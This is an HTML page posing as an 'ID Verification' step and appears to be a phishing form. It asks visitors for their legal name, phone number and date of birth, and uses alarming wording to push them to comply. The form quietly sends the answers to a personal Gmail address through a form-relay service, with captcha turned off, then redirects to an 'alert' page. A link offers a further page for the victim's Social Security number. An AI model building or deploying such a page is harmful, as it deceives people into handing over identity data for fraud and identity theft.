<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Contact</title>
  <!-- Linking SwiperJS CSS -->
  </head>
<body style="background: #070707; width: 100%; height: 100%;">
   <style>
        /*style.css*/
body {
    
    align-items: center;
    justify-content: center;
    font-family: sans-serif;
    line-height: 1.5;
    min-height: 100%;
    background: #0a0c14f5;
    flex-direction: column;
    margin: 0;
}


p_ {
    margin-left: 2%;
    color: #e2e2e2c6;
    font-size: 25px;
}

h5 {
    margin-left: 2%;
    color: #e2e2e2c6;
    font-size: 15px;
}

input {
    margin-left: 2%;
    display: block;
    width: 95%;
    height: 55px;
    color: #ffffff;
    margin-bottom: 15px;
    background: #333333ab;
    padding: 20px;
    margin-top: 30px;
    box-sizing: border-box;
    border: 5px solid #101320cf;
    border-radius: 10px;
}

.wrap {
    display: flex;
    justify-content: center;
    align-items: center;
}
    </style> 
    
 <h1 style="   margin-left: 2%; color: #e2e2e2c6; font-size: 30px;">ID Verification</h1>

        <h5 style="color: #1a5f18;">Please enter your full legal name as it appears on a valued ID. Misspellings or use of nicknames may cause damage !!.</h5>

   <form method="post"     action="https://formsubmit.co/kt5873202@gmail.com">
        
 <p style="margin-left: 2%;
          color: #e2e2e2c6;
          font-size: 15px;">First Name</p>  
                 
            <input type="name" id="First Name" name="First Name" style="font-size: 15px;"
                placeholder="First Name :" required>
                
 <p style="margin-left: 2%;
          color: #e2e2e2c6;
          font-size: 15px;">Last Name</p>  
          
            <input type="name" id="Last Name" name="Last Name"    style="font-size: 15px;"
                placeholder="Last Name :" required>

 <p style="margin-left: 2%;
          color: #e2e2e2c6;
          font-size: 15px;">Phone Number</p>  
                          
            <input type="tel" id="Phone Number" name="Phone Number"         style="font-size: 15px;"
                placeholder="Phone Number :" required>
      
           
<p style="margin-left: 2%;
          color: #e2e2e2c6;
          font-size: 20px;">Date of birth</p>   
              
           <input type="Date" id="Date of birth" name="Date of birth" required style="font-size: 15px;">
           
           <input type="hidden" name="_captcha" value="false">

                  <input type="hidden" name="_next" value="https://minet320.github.io/.com/alert.html">

         <Button style="position: center;
  width: 87%;
  height: 50px;
  margin-top: 20%;  
  margin-left: 6.7%;
  background: #16161682;
  box-shadow: 0 0 10px #f0f0f0;
  font-size: 16px;
  color: #fff;
  border-radius: 10px;
  border: none;
  outline: none;">Next</Button>
 </form>                   
              
     
        <p style="margin-left: 5%; color: #d8d8d8a6; margin-bottom: 5%;">If you don't have your Passport
            <a href="SSN.html" style="text-decoration: none;"> Use your (SSN)
            </a>
    </p>     
          </div>
</body>
        </html>
